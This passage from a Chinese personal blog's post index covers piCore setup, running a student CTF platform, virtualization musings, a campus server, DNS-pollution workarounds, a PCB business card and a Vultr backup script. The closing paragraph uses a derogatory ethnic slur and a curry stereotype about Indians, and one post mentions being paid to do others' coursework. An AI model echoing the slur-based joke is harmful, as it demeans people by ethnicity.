另外就是运用资源的问题了，这么多资源我自己用都想不出来干什么比较好，所以我考虑要不然搞IDC？总之在资源利用起来之前先让它们为世界做点贡献吧，这些服务器算力确实猛，在WCGrid里目前我的每日排名都能达到世界前200，确实厉害。" },{ "title": "在树莓派上体验piCore", "category": "", "tags": "树莓派, piCore", "url": "/2020/12/07/picore.html", "date": "2020/12/07", "content": "麻雀虽小，五脏俱全起因最近想让协会的打印机共享到网络上，但是又没有什么好的方法，如果用电脑的话体积有点太大了，所以我就考虑用树莓派来共享。   我手头有一个吃灰多年的树莓派，有一个问题是我应该在上面装什么操作系统比较好？一般来说在树莓派上肯定是装官方的Raspberry Pi OS会更好一些，但是官方的系统很大，下载也有点慢，所以就想找个小一点的系统来处理。   最终，我找到了一个叫做Tiny Core Linux的发行版，它有一个专门为树莓派开发的一个叫做piCore的发行版，下载下来只需要23MiB，可以说是非常不错了，毕竟就算是Raspberry Pi OS lite也要400多MiB。   另外，点击这里就可以下载安装包了。使用方法总体来说piCore还是挺不错的，文档写的也还可以，该有的功能基本上都有了。安装很简单，和树莓派一样直接把镜像写入MicroSD卡就可以直接使用了。不过有一个问题是它的系统不是直接挂载分区使用的，它的根目录是在内存里面的，所以如果直接断电所作的操作没有办法保存。   不过他们提供了一种方案来解决这个问题，在对根目录下的文件进行操作后，可以执行filetool.sh -b把修改写到一个特别的文件里面，之后每一次开机系统都会读那个特别的文件来保持重启后数据不会丢失。   第一次启动的时候系统会自动生成SSH的Key，所以第一次启动就要执行上面的命令。这些事情在README都有写。另外就是使用完整分区的问题，根据这个发行版的设计，所有的操作会写到第二个分区里面，但是默认情况下第二个分区只有16MiB，所以要扩大这个分区的大小。   顺便一说，这个系统的默认用户名是tc，密码是piCore。   扩大的方法在README里面也有写，但是全英文而且写的也不太清晰让我很难受，而且在国内貌似几乎没有人使用piCore，导致我第一次搞这个东西的时候很痛苦，所以我还是在这里记录一下吧。扩大分区首先第一步执行sudo fdisk -u /dev/mmcblk0，然后输入p查看分区，接下来记住第二个分区的StartLBA。记好以后输入d删除第二分区并且输入n重新创建分区。其中出现First Sector的时候输入刚刚记住的数字，其他的就默认就行了。最后输入w保存。   很神奇的是用fdisk操作分区的时候并不会让被操作分区的数据丢失，貌似它只会修改分区表，也许这才是fdisk真正做的事情吧……   在此之后需要重启一次，然后执行resize2fs /dev/mmcblk0p2让文件系统获得真正的大小就OK了。安装软件这个系统安装软件也很神奇，由于它的系统在内存中，安装软件肯定也不能直接安装到指定的位置。他们设计了一种很神奇的安装方法，就是把程序写到一个镜像里面，然后使用的时候挂载就可以用了。直接操作可能会比较麻烦，所以他们设计了一个脚本让任何人都可以随便安装软件。   像debian系列的发行版都使用的是apt来管理软件的，piCore也整了一个类似的东西，叫做tce-ab，用起来比apt还要方便，它是一个可交互的脚本，想安装软件可以直接在里面搜索。方便确实很方便，而且清华源里也提供了这个系统的镜像源，还是挺不错的。   不过卸载的时候就有点麻烦了，它貌似没有卸载的命令，需要自己手动去/mnt/mmcblk0p2/tce/optional/这个路径把软件删掉。不过其实还好，文件都在一起，倒是也没有特别的麻烦。配置Wifi因为piCore默认没有Wifi的驱动我还以为它不能用Wifi，不过还好，这个安装软件的功能可以直接安装Wifi的管理软件和驱动，用起来挺方便的，直接搜索wifi就可以安装，不过我在里面又找到了一个叫做firmware-rpi-wifi的包，虽然不知道需不需要安装，但是看起来好像需要的样子就安上了。   还有一个问题就是即使安好后也不能自动连接Wifi，这个问题处理起来也很简单，第一次连Wifi是用的一个叫做wifi.sh的脚本，连好以后就可以在/opt/bootlocal.sh文件里写一句wifi.sh -a，这样它以后每次启动都会自动连接Wifi了。不过还有一点需要注意，在做完这些配置之后都需要执行filetool.sh -b来保证修改能在下一次重启的时候被应用。与Raspberry Pi OS lite的对比这样一波操作下来感觉基本上Raspberry Pi OS lite和piCore在功能上也没啥区别了吧，piCore不仅更快还更小，从安装包来看piCore要比Raspberry Pi OS lite小20倍！   这样看来还是piCore更好啊，为什么国内连相关的文章都搜不到呢？也许是因为piCore需要自己探索吧，大家一般都用的是树莓派官方的系统，而且因为Raspberry Pi OS lite用的是apt管理更方便所以就没人用piCore了吧……   不过树莓派不就是用来折腾的嘛，所以我还是更支持piCore！😀" },{ "title": "记一次组织CTF的经历", "category": "", "tags": "CTF, 记录", "url": "/2020/11/24/createctf.html", "date": "2020/11/24", "content": "不会打我也能搞CTF(:-P)起因在一年前，我体验了一次CTF，感觉挺有意思的，而且为此我甚至计划做一个以此为基础的游戏。可惜人不行了，除了会咕咕咕其他什么都不行。   想不到就在最近，我不用参加CTF，而是直接去给其他人玩CTF的机会。最近我所在的协会要承包一次CTF的比赛，我作为协会部门的部长，自然也要参与其中。我最擅长的就是运维，所以在这次比赛，我就成为负责维护这次CTF平台的运维了。感受成为了维护CTF系统的人之后我对CTF的了解更深了，CTF系统的本质就是一个计分板加一台靶机，然后题就那么几种，像Web、PWN这种题需要靶机，其他的Crypto、Reverse、Misc啥的就只需要把题目放到一个文件服务器里就行了。另外计分板也非常的简单，就只需要一个判断结果是不是等于设定好的flag就完事了，然后根据答题情况给分就行了。   一般正式的赛事中好像flag都是动态的，每一个队伍的flag都不一样，然后每个队伍打的靶机也全部都是用docker隔离开的，像我们举行的这个CTF并不算专业，只能算是比较业余的。经历在这次CTF中，我本来是不想管平台的事情，如果我来搭建这个平台我可能会选择CTFd作为本次CTF的平台。不过这个CTF在我来之前举办过几次，他们使用的是由Facebook开发的FBCTF作为整个比赛的平台。我作为运维，肯定也不会去管程序上的事情，就干脆让他们去搞相关的事情了。   不过现实证明这是一个错误的决定，这个平台已经不维护了，虽然看起来确实挺好看，但是BUG也多，在这次比赛中给我们维护组带来了不少的压力。就比如说这个平台里的这一句话，给我们带来了很多麻烦。就这样的短短一句话，搞的正在运行的平台直接被迫停止运行。为什么呢？很简单，因为我所在的学校是中国啊，不允许这样的事情发生……   另外这个FBCTF也很迷，看代码不过就是普通的PHP而已，但是部署的时候用的软件和方式都和平时不一样。正常来说这种东西一个LEMP或者LAMP就能解决问题，而它非得要一个什么hhvm的环境，不过环境不是我搭的，它用啥我倒是不在乎。然而它的i18n有问题，在这一行没有加tr的那个函数，然后注册的时候显示就会出问题。有问题倒是没关系，大不了改了就行了，可是这个破玩意改了之后居然没反应？我搞了半天都没有搞好，后来发现因为它用了hhvm，这个东西会把php代码编译，然后直接修改代码就啥反应都没有，必须用hhvm-repo-mode才能更新代码😓……   其他的就是数据库，那个部署的人当时居然没改字符集，用的还是拉丁文的字符集，然后存储中文的时候就会各种乱码，怎么搞都搞不回来，不过程序里面好像没有受影响，所以也就算了。   还有就是领导的新需求，这也算是提前体验公司生活了，领导说要加一个功能，我肯定不会想着去接这个大坑，最后这个任务被派给了我们的PHP老师，不过老师确实专业，花了4个小时最终真的就搞成了，水平确实了的。   目前这次的比赛还没有结束，不知道还会出什么新的莫名其妙的事情，敬请期待吧~" },{ "title": "关于虚拟化的学习记录", "category": "", "tags": "虚拟化, 记录", "url": "/2020/09/27/vm.html", "date": "2020/09/27", "content": "虚拟机……感觉有点哲学。Mayx的虚拟化学习史PC上的虚拟机使用史在我小的时候，我就玩过虚拟机，那时候Windows10还没有出来，用的还是WindowsXP的系统，那时候我使用的虚拟机软件是VMWare Workstation。过去的VMWare和现在的感觉区别不大，十年过去了感觉加的功能也不多，非要说哪个功能有更新的话可能也就是随着现在的物理机更新一样增加了一些比如UEFI之类的功能吧。   后来我用上了Windows10，那时候我还是第一批用上Windows10的人，正式版还没有出来，我就已经用上了技术预览版，不过直到正式版出来我依然使用的是VMWare做虚拟机。后来我在系统里乱逛的时候发现了Hyper-V，那是一个比VMWare更轻量，更底层的一个虚拟机，不需要下载其他程序，就能在Windows10里直接打开，非常方便。   自从我知道了Hyper-V后就再不用VMWare了，除了两个不能共存的原因之外还有就是Hyper-V感觉更稳定，速度更快，而且与Windows的结合更好。不过有一个缺点就是没有办法挂载USB设备，这个就很麻烦……   以前我在用VMWare的时候经常遇到一个问题就是有时候虚拟机里面的系统卡死了，但是我点关机的时候用的是客户机关机，然后VMWare就卡死了。这时候就算结束掉它用来获取计算资源的进程vmware-vmx.exe也没用，就算是注销也不行，只能关机，重启之后也经常会因为锁的原因而出现打不开的问题就很麻烦。但是自从我用了Hyper-V之后就再也没有遇到过这种情况，大概是因为Hyper-V对资源的管控更好吧，基本上不会出现虚拟机把物理机怼死的情况。   说到这里就让我想起最近我安装的ESXi了，由于我的主电脑用的是Hyper-V，垃圾ESXi没有Hyper-V网卡的驱动，然后就怎么装都装不上，然后没办法我就只能用我的旧电脑安，结果安好之后发生了一个很神奇的事情，就是用ESXi创建一个虚拟机然后启动之后物理机就直接断电重启了，这就有点不太合适了，虚拟机无论怎么搞能影响到物理机就不太合格了啊。   总的来说可以发现PC机虚拟化的软件基本上都是依靠CPU内置的虚拟化指令来运行的，所以效率很高。手机的虚拟机使用史手机上我也安装过不少种类的虚拟机，最早我用的手机性能很差，好像还是清华紫光的CPU。那个垃圾手机当时我还拿来当服务器使。虽然我也知道其他的虚拟机但是那个手机带不起来，我记得最早我用的是DOSBox Turbo，在那个上面我安装了一个Windows3.2的系统。不过这个软件除了这一个虚拟机就不能再开别的系统了，而且基本上没有隔离，它可以直接访问手机里的文件，这就不太好。   后来我用上了一个稍微好一点的手机，那时候我知道了Bochs，不过那个系统不是我自己装的，那个软件的配置文件对那时候的我来说太复杂了，我看不懂，所以是直接用的贴吧上的镜像。   知道了Bochs之后我就了解到了Limbo，那是一个基于qemu的虚拟机，用起来要比Bochs简单很多，不用写配置文件就可以直接使用。所以这个东西只要不是用的需要一些特别的指令都没问题，我试着装了WindowsXP以及MenuetOS、KolibriOS、TempleOS等等基本上都可以正常运行。   后来我还试了试别的软件，比如VMOS，好像也是一个基于qemu的虚拟机，不过它是ARM指令集的，安装的是Android系统，在很多时候运行一些有可能有问题的软件很方便。   还有一个是ExaGear，是基于Wine制作的，它只能在一定程度上运行Windows的程序，而且因为它也是跨指令集的，其实效率不这么高。   以上我们可以发现手机上的虚拟机基本上都是软件模拟的（指令集都不一样想怎么搞虚拟化指令？），虽然ARM的CPU应该支持硬件虚拟化，但是目前我的了解是没发现有类似的软件。其他平台的虚拟机除了在电脑和手机上的虚拟机，还有在浏览器上运行的虚拟机（真就JS创造宇宙呗）。qemu的作者Fabrice Bellard曾经写过一个叫做JSLinux的项目，可以运行比如x86指令集的系统，相当厉害。对虚拟化概念的探索说完对虚拟化平台的使用，我觉得虚拟机的概念和实现还是比较神奇的。什么是虚拟机？我觉得应该只要是在逻辑上提供运算及存储资源的东西都可以称作是虚拟机，包括人也可以作为一种虚拟化平台。我以前听说过一个故事讲的是图灵下国际象棋，他写了一个下国际象棋的程序，但是那时候还没有电脑。于是他自己就模拟电脑的执行方式和朋友下完了象棋。我觉得他在执行这个程序的时候就相当于开了一个虚拟机，在逻辑上构造了一台可以运行他程序的机器，毕竟图灵是人，不是机器，所以我觉得应该可以叫做虚拟机。   但是这么来说的话，只要不是实模式的操作系统我觉得应该都算是虚拟机，因为程序没有真正享用到电脑的所有运算与存储资源，它们的资源都是由操作系统所分配，这么来看操作系统岂不是也是虚拟机？那么这种虚拟机的意义就和实际的虚拟机意义不相符了，我觉得应该再加一些限制条件。   操作系统的特点是BIOS将代码载入到内存中，程序的特点则是操作系统将代码载入到内存中。这么来看的话我觉得就可以得出需要BIOS载入代码，并提供运算和存储资源的东西应该才能叫虚拟机……但是BIOS又算什么呢……emmmm所以就是这种原因导致了我感觉虚拟机有些哲学。   除此之外还有像沙箱、Docker这些对资源再次分配的程序，它们只是进行资源限制，但是程序的代码不是由它们载入的……这就更迷了……未解决的问题一般我们认为虚拟化是将一台电脑的资源合理分配，把一台电脑当作很多台来用，但是我听说有一种叫做虚拟化集群的东西，可以把一大堆电脑模拟成一台电脑来用。但是这时候我觉得就会有一些问题，比如一般程序会有比如进程间通讯之类的功能，但是两个进程假如放在了不同的两个电脑，它们的通讯岂不是要通过网线？正常情况下应该是通过内存进行通讯吧？这个速度估计得差几千倍，就算是多CPU的服务器之间也是通过总线连接。拿网线连接真的能用吗？这就让我对虚拟化集群这个感到有些迷惑，不知道那些虚拟化软件是怎么搞的。" },{ "title": "如何建立一个校园内部网站", "category": "", "tags": "网站, 校园", "url": "/2020/09/10/site.html", "date": "2020/09/10", "content": "其实我感觉大学生活也挺好的。起因去年我进入大学后加入了一个专门研究云计算以及网络（名义上）的社团，不过那时候我才是大一新生，加入后没有权限。到了第二年，我成功的进入了管理层，这次我就可以好好的看看这个社团有什么有意思的东西了。   首先，社团内有专属于自己的网络，社团办公室内有一个交换机是连接所在教学楼的网络的。另外还有一个树莓派，看起来好像是一次都没有用过，系统也是全新的RPiOS。   除此之外，社团内有一台机架式服务器，看起来好像好长时间没有用了，第一次启动直接报内存错误，我只好把内存条拆出来擦了擦才能正常开机。   我以前觉得服务器应该配置相当高，不来个双路TR3990X，再整个一堆上TiB的内存根本不能称作服务器。不过这台垃圾服务器改变了我的想法。这是一台主板型号为S5500HCV的服务器，有双路CPU和4条4GiB的内存条，硬盘500GiB还是机械的。仔细看了看这双路的CPU怎么加起来才8个核心，而且还不支持超线程？这配置还不如我新买的笔记本电脑，然后大小还特别大，比一般的机箱大得多，而且开机速度又慢，风扇还不支持调速，真是有够垃圾的。   不过垃圾就垃圾吧，毕竟还是个服务器，最起码还能支持24/7工作制，365天全年不断电应该是可以保证的。既然有了这样的资源，我觉得应该搞点什么在服务器上面，不然这么大的东西闲置也挺浪费的。服务器的折腾之旅最开始我是打算装ESXi的，因为自从有Hyper-V之后我基本上就没用过VMWare了，而且这俩还是互斥的。以前看到ESXi之后挺想在我的Hyper-V虚拟机里装一个，可惜ESXi这个系统实在是太垃圾，安装必须要网卡驱动然后它支持的驱动还特别少，所以这次有了真正的服务器自然是想试一下装个ESXi玩玩。   首先我装的是ESXi7，打开后结果又是没有显卡驱动，所以我只好下ESXi6试试看，打开之后确实可以装了，但是装好之后却没办法引导了，这就很奇怪，所以我只好放弃安装ESXi的想法。   之后我就想着要不然就正常的安个服务器操作系统吧，Ubuntu用的多了，干脆安个CentOS好了。不过安CentOS有不少坑，因为我安装没办法用光盘装，一般都是先录到U盘里再装，但是不知道为啥，CentOS的引导是用的是卷标名，然后U盘只能用11位的卷标名，安装程序就没法引导。   除了这个坑之外还有一个就是8和8-stream版本的不同。因为直接把整个CentOS下下来很麻烦我就直接下的是网络安装版的。安装程序我下的是8-stream的，但是我当时不知道用哪个源，结果搞成了8的源，装到一半就出错退出了，很难受，之后仔细检查才发现原来是版本搞错了。   安好之后就是如何管理服务器的问题了，虽然直接用SSH或者用自带的Cockpit也挺不错，显得很专业，但是我觉得麻烦就直接用了某删库塔面板了，反正是在内网里也没谁会攻击，而且安装配置确实方便，想做的事情一键就能搞定。   虽然这个服务器挺垃圾，但是至少要比一般的云服务器强，同配置的云服务器要不少钱我肯定是不会租当然也没用过。所以像什么Gitlab之类的我可以随便装，反正有16GiB内存也不担心。   另外就是网页服务器的环境了，面板确实方便，轻轻松松就能装一个博客、论坛加网盘了。既然网站建好了，就要考虑如何访问的问题了。如何公开自建服务器正常情况下我们用的网络都是经过路由器的，然后就会有NAT就没法从外面访问里面的服务。一般情况下解决这个问题就是用内网穿透，比如frp之类的。不过我们的网站不太适合暴露到外网上，毕竟开了一大堆服务，又没有防火墙，密码还超级简单，万一服务器被外面的人攻破了学校内网估计也得凉。   不能暴露在外网的话至少学校内网能访问也不错啊，不过服务器前面连了一个路由器，经过了一次转换，然后就没办法在学校内访问了。还好路由器可以设置DMZ主机，把服务器的内部IP设成静态的然后开DMZ主机就能解决这个问题了，另外路由器连接的校园内网也没有NAT，所以在校内就可以直接运行了。给网站加个域名虽然通过上面的方法可以让大家访问服务器，但是有一个问题就是动态IP的问题。我可以改在社团的路由器，但是不能改学校的交换机，所以IP地址没办法固定，虽然也可以直接在服务器上改成固定IP，但是我担心这样会造成IP冲突之类的问题。这种情况就很麻烦，因为好多网站内链都是带站点地址的URL，我建的网站都是通过引擎建的，改又不好改，这就很麻烦。   这个问题比较好的解决方案就是使用域名，域名解析的结果不一定必须是一个外网地址，内网地址同样可以解析。这样我回头可以买个域名然后解析，如果发生断电之类的问题导致IP改变我就可以直接改一次就行了。DDNS也是个不错的解决方案，不过这种事发生次数不多所以就懒得搞了。合理利用资源虽然建了网站，但是平时也没有人访问……而且就算有人访问服务器运行网站服务程序基本上没什么压力，这样服务器运行基本上就是空转了。既然我打算让它持续运行肯定不能让它空转，我肯定要搞点啥利用好这个运算资源。挖矿是个不错的选择，但是我不屑于去做，不如搞点为人类发展做出贡献的事情，像World Community Grid这样的志愿计算项目就挺不错。   于是我就在上面安装了BOINC，这种程序虽然会占用大量的运算资源但是它的运行优先级很低，所以网站运行完全没有影响，这样就能合理的运用好这些计算资源了。" },{ "title": "网站被Ban怎么办？", "category": "", "tags": "网站, Ban", "url": "/2020/08/28/banned.html", "date": "2020/08/28", "content": "虽然不是第一次，但是这事终于落到我头上了起因在一年前，我写了一篇Anti-Ban的文章，主要讲的是如何避免由于网站被Ban导致的无法访问。   然而现在身份换了，我不再是被Ban网站的访问者，而是维护者，这时候我们应该怎么办？解决方案我维护的网站就是花火学园，前两天网站的域名say-huahuo.com包括其子域名都被DNS污染了。污染的当天访问量直接下降3/4，简直是太恐怖了，而且这还只是防火长城的最低级别的攻击。   被污染的两天后百度权重骤降，直接预估流量暴降10倍……我以前还挺自信的，让网站与域名耦合度很高，这么一搞，我以后是不敢再在内链里搞URL了，最多就是绝对路径，然后像我之前还搞什么图床之类的现在出现这么个事也不敢再搞子域名了。   当然域名被污染这个也不是什么大事，在我维护前貌似也出现过类似的事情，那时候的用户量远比现在低，解决方案也很简单就是换域名，只是我以前太自大了好多配置的地方都用的是带域名的URL，所以直接换就会出现好多问题。   还好Nginx有一个叫做sub_filter的模块，我可以直接使用这个模块把页面中所有涉及say-huahuo.com的部分全部替换成现在的say-huahuo.me。虽然这样会增大服务器的压力但是也没有啥更好的办法了，以后有机会再把数据库里的所有链接替换一下应该就没问题了吧。   不过那也只是个辅助的方案，大多数情况还是要Discuz里面调整。首先要在后台把所有有关应用域名的东西全部关掉，然后在配置文件里把cookie域删掉，另外还要改一下UCenter的配置文件，要把UC_API的地址改成/uc_server，不然头像就会调用带域名的URL然后就会出问题。永远要考虑用户其实对于我来说，换不换域名都是次要的，因为防火长城最低级别的攻击DNS污染使用DoH、DoT、DNSCrypt等一大堆避免被污染的方案就可以解决，实在不行用hosts文件手动设置IP也行嘛。   虽然这么说，但是访问网站的一大批用户全是电脑小白，那些人能把手放在鼠标上能用键盘打几个字已经很了不起了，像复杂的事情他们也不会懂。虽然我维护的网站没有广告，流量对我来说毫无意义，但是维护一个没有人访问的网站也很无聊啊，没有人访问网站开着有什么意义？如何使用国外的服务器检测DNS污染一般防火长城都是在国际网络出入口设立的，所以如果是国内访问国内还是国外访问国外都是不通过防火长城的。所以怎么样才能在国外检测某域名在国内的状态呢？   我之前也不清楚这个问题，后来发现，只要用国内的DNS来解析不就好了嘛23333，在国外也可以用nslookup使用国内的DNS，这样就会经过防火长城而实现检测的功能了。总结通过这件事，我明白了防火长城再垃圾也是能防住大量用户的，毕竟大量用户都是小白，而且域名一旦被他们认证，终身也别想解禁，所以一般情况下还是不要惹他们比较好。   另外只搞了备用域名没搞发布地址也确实是考虑的不够周全，不过也确实是我太自大了，怎么会认为那样的网站不会被防火长城屏蔽？虽然这个域名活了将近两年，但是确实我们做的准备不够充分。   还有就是尽可能不要滥用子域名，虽然说有些静态资源放到子域名可以不传cookie可以让速度更快一些，但是这种事对我们来说没有意义，另外就是不要让网站与域名耦合，万一哪一天要换域名麻烦事就出来了。像我的博客用的基本上都是绝对路径，这样就能避免由于GitHub Pages域名出问题之后换域名困难的问题了。" },{ "title": "假期总结第二弹", "category": "", "tags": "假期, 总结", "url": "/2020/08/21/sth2.html", "date": "2020/08/21", "content": "这个假期还真是“长”啊……依旧什么也没做去年我写了一篇假期总结，什么也没做，今年比去年更糟糕，更加的什么都没做。   最近我感觉我的思维就像是一块蛋糕，被万恶的资本家疯狂的切割，不是那种平均分的切法，而是一刀下去先切一半，第二次在其中一块上切三刀，第三次切四刀……总而言之我也不知道我在说什么，意思就是思考能力就如同抛物线那样下降，大概就是这样。   在这个假期我总算是把驾照考下来了，不过考下来之后我感觉好像也没啥，什么感觉都没有，不过是有了开车的资格罢了。   如此长的假期，将近有半年，在上课期间，每天在床上打开手机，什么也不做……   感觉我的处境还是有点危险的，没有目标，不是真的没有目标，而是没有实现目标的意义……做事情给谁看呢？   以上就是被切割成为2n的感受，思考能力下降的很严重，就好像一块装有服务器的CPU的电脑安装了很老的家庭版系统，不支持多核心，每个核心的频率还很低……也许不完全什么都没做我想不起来这个假期我还做了什么，也许之前的文章里都有写，但是最近确实啥都没做。   唯一我想到的事情是学校推迟了几天开学，可是我提前买了机票。然后发现改签还不如退票重买便宜，然后就重新买了。所以以后如果遇到了类似的事情，再看看那一天机票的价格吧。想要做的事情我没有能力思考更多的事情了，正好手头有一个好几年前的旧山寨机，想想我能用它做什么更多的事情吧。   😢" },{ "title": "如何制作一个PCB名片", "category": "", "tags": "PCB, 名片, 制作", "url": "/2020/07/29/card.html", "date": "2020/07/29", "content": "感觉设计PCB也挺有意思的前言这个月虽然依然是假期，但是总感觉比其他月做了更多的事，毕竟是到了期末，考试的准备不说，为其他人完成期末作业这也费了不少精力，因此也赚了几百块钱。   除了期末，我还要为科目三的考试做准备。虽然练车每天不过1小时，但是回来之后就啥也不想干了……再过几天我就要去考试了，希望能顺利通过。   在假期间，我在网上看到了一个很有趣的东西，叫做PCB名片，就是把电路板做的像名片一样。看起来挺有意思的，不过我从来没学过电路设计（网络工程的人怎么会去学习电路设计呢？），所以虽然看起来很有意思，但是我一窍不通啊……   说是这么说，但是只要想做，有搜索引擎什么做不到？于是接下来我就开始了学习电路设计的路程。收集资料据那些做PCB名片的人所说，他们是使用AD(Altium Designer)进行设计，然后发到一个叫嘉立创的网站进行制造。首先我肯定是先去下AD，不过看了一下大小之后就不想下了，那个软件要2-3GiB大……我想我可能也就做一次PCB，又不会经常用，所以也不想下这么大的软件。   像电路设计也不可能只有AD一个软件，于是我就开始搜还有什么其他的EDA软件可以用。搜着搜着发现了有一个可以在线设计PCB的网站，叫做立创EDA，这不是正合我意嘛，想不到这个在线设计的网站和制造PCB的那个公司是一家的，这样倒是也方便。开始设计既然整个流程大概都搞明白了，接下来就该设计了。当然从来没学过电路设计自然也不知道怎么用这个软件，接下来我打开了教程，然而我的表情是这样的：      像教程这种东西实在是一点用也没有，大多数教程都是给能看懂教程的人写的，像我完全不了解的人就根本不会看这种东西。那怎么办呢？不会用还不看教程，怎么才能用这个软件呢？   这时候就用到了作为设计师的本能了，设计师都是心意相通的，所以只要是按着为用户着想的设计理念做出来的软件，我基本上都会用。 （Adobe公司做的垃圾软件就没有符合这个理念）   这个软件可以直接用浏览器打开，也有客户端，客户端是Electron做的。我不太喜欢Electron，因为感觉它的效率比较低，因此VSCode我也没有装。但是这个网页版在Edge上的兼容性不太好，所以我只好使用它的客户端了……倒是也不大，不到100MiB还是挺不错的。   打开了这个软件之后随便按了按，大概的按键我倒是都搞明白了，有几个划线的按钮，分别可以画直线和弧线，然后就是打孔的选项，还有一个画矩形和多边形的。除此之外还能插入图片和文字，总体来看和画图软件差不多，只是它好像有一堆奇奇怪怪的层。   一开始这些层我完全搞不清楚是干啥用的，啥阻焊层还是什么丝印层乱七八糟的我根本搞不清楚。还好它有一个3D预览，可以看一下最终做出来的大概效果，通过这个我大概明白了丝印层就是在电路板表面印的白色的字，阻焊层就是电路板表面涂的有颜色的漆。只是设计的时候是把那层东西挖空。   了解了这些之后我就开始设计了，把喜欢的图片导入，然后按照喜欢的方式进行布置。虽然说一般电路板应该是要实现功能的，但是我不会做，做出来也是为了玩，所以我最多也只是在上面加了一个线圈，其他的什么功能也没有。制造结果我一开始做的时候不清楚PCB的本质，以为它是在铜板上划出电路，结果今天我取到货之后才发现完全不是这样，PCB其实是在塑料板上打印铜线，所以我在第一次设计的时候没搞清楚这个问题，我把有些阻焊层去掉之后下面就直接露出了塑料板，不怎么好看，所以今天我明白之后修改了一下图纸，又上传上去让他们制造了。   打印5张这样的PCB名片倒是挺便宜的，5张一共才5CNY，虽然说真正的名片5CNY可能能打100张，但是制作一次也不过是相当于喝了一大瓶饮料而已，所以再打一次也没关系。   另外我想吐槽一下快递的速度，制作板子花3天时间可以理解，但是快递送4天就有点过分了，最终下单一周之后才取到。上次我用的是京东快递，真的是体验极差，这次我换成了顺丰的希望它能快一点。" },{ "title": "论备份的重要性", "category": "", "tags": "备份", "url": "/2020/06/17/backup.html", "date": "2020/06/17", "content": "只有事情发生到自己头上才想到要解决起因今天早上发生了一件很糟糕的事情，一打开聊天软件就发现有人在说我维护的花火学园挂掉了，错误信息是无法访问源站。我觉得挺奇怪，服务器又没啥负载，我也有一段时间没登进去了，怎么服务器就挂掉了？   我试着用SSH连接，同样无法连接，我发现事情不太对劲，然后就登到了Vultr里看了看。结果发现我的服务器在00:00之后就像一个死人一样，CPU负载被拉成了一条直线，就那样保持0%的位置。我以为是因为莫名其妙的原因服务器关机了，然而我重启以后仍然没有解决问题。   登录到终端一看，No bootable device就这样显示在屏幕上，硬盘直接读不出来了，这下可不得了了，我赶紧去快照里看了一下，发现最后一次快照的时间在5月30日，也就是说如果没能恢复数据这十几天的所有信息都将消失！难以想象的垃圾服务商：Vultr首先我要做的事情当然是想办法先恢复服务，虽然那个快照有点早，但是先顶上再说吧……   想一想我的防护应该做的也没啥问题，而且一般成功入侵服务器的人也应该是删库然后留一条信息的那种，直接干死硬盘的我还真没见过。于是我开始发Ticket给Vultr，看看到底是怎么回事。   Vultr在我问完的4个小时后给出了最终的解决方案，把我的服务器直接重置，在上面安了新的操作系统然后给我赔了两个月的服务器费用……原文如下：  Hello,  In the past 24 hours, we sent notification of a node failure impacting your cloud server listed above.  Despite extensive efforts, our attempts to manually recover your cloud server were unsuccessful.  Our engineering team is currently deploying new instances with the same operating system and IP and you will receive login details in a separate message. You may also deploy a backup or snapshot on a new instance with a new IP if you prefer.  Our staff will be applying a two month account credit for the affected services shortly.  Regards, Bryan M. Systems Administrator哇，这真是太糟糕了，作为一家云服务器商就直接把客户的数据搞没了，然后就赔2个月的费用？要知道数据无价啊，就这么不负责任的吗？简直是不可思议啊！   不过我也没什么好办法了，也许他们不重装我还想着试试SystemRescueCD试试看能不能把整个磁盘复制出来，但是他们既然已经直接重装那就彻底没救了……QAQ亡羊补牢既然数据已经救不回来了，那我们也只能向前看，得想办法避免以后再出现这样的问题。因为我最近在期末阶段，比较忙，所以也不经常去打快照。虽然以前也出现过服务出问题的情况，像MySQL挂了、CDN挂了、还有一次好像是交换机出问题了，但是无论如何数据从来没有丢失过。这一次数据都能丢了也真的是太糟糕了，要不是有快照，那就真成删库跑路了……         既然没时间打快照，我得想个办法搞一个自动打快照的东西。在网上搜了搜，还真有这样的脚本，于是我拿来改了改就装上去用了。自动快照的脚本import requestsfrom requests import getimport reimport jsonclass __RPC:    def __init__(self, api_key, name):        self.api_key = api_key        self.api_info = None        self.name = name        self.errors = {            200: \"Function successfully executed.\",            400: \"Invalid API location. Check the URL that you are using.\",            403: \"Invalid or missing API key. Check that your API key is present and matches your assigned key.\",            405: \"Invalid HTTP method. Check that the method (POST|GET) matches what the documentation indicates.\",            412: \"Request failed. Check the response body for a more detailed description.\",            500: \"Internal server error. Try again at a later time.\",            503: \"Rate limit hit. API requests are limited to an average of 2/s. Try your request again later.\"        }    def api_info_initial(self):        self.api_info = {\"snapshot/create\":\"POST\",\"snapshot/destroy\":\"POST\",\"snapshot/list\":\"GET\",\"server/list\":\"GET\"}    def __getattr__(self, name):        return eval(\"__RPC\")(self.api_key, self.name + \"/\" + name)    def __call__(self, **kwargs):        if not self.api_info:            self.api_info_initial()        if self.name not in self.api_info:            raise ValueError(\"The API is not exists.\")        if self.api_info[self.name] == \"GET\":            res = requests.get(\"https://api.vultr.com/v1/\" + self.name, headers={\"API-Key\": self.api_key},                               params=kwargs)        elif self.api_info[self.name] == \"POST\":            res = requests.post(\"https://api.vultr.com/v1/\" + self.name, headers={\"API-Key\": self.api_key}, data=kwargs)        if res.status_code == 200:            return res.status_code, res.text.strip()        elif res.status_code in self.errors.keys():            return res.status_code, self.errors.get(res.status_code)        else:            res.raise_for_status()class Vultr:    def __init__(self, api_key):        self.api_key = api_key    def __getattr__(self, name):        return eval(\"__RPC\")(self.api_key, name)vultr = Vultr(\"API Key\")data = {'SUBID': '实例ID'}status_code, resp = vultr.snapshot.create(**data)requests.post(\"https://sc.ftqq.com/SCKEY.send\",data ={\"text\":\"快照已创建\",\"desp\": str(status_code)+resp})# 删除旧快照status_code, resp = vultr.snapshot.list()  # /v1/snapshot/listif status_code != 200:    print('获取快照列表失败' + str(status_code) + resp)else:    print('成功获取到快照列表')    data_list = list(json.loads(resp).values())    data_list.sort(key=lambda x: x['date_created'])  # 默认时间排序，由近到远    data_list_del = data_list[::-1][9:]  # 取超过9个之后的快照    for data_del in data_list_del:        data = {'SNAPSHOTID': data_del.get('SNAPSHOTID')}        status_code, resp = vultr.snapshot.destroy(**data)  # /v1/snapshot/destroy        if status_code != 200:            print('删除旧快照失败')        else:            print('成功删除一个旧快照')把这个脚本放到Crontab里，每天执行一次就行了。后记相信服务器厂商是完全靠不住的事情，自己还得想办法做好备份。我甚至在想，阿三把Intel和微软都占领了，会不会有一个阿三也跑到Vultr里，然后对着我的硬盘大喊“把你变成咖喱”之类的23333。   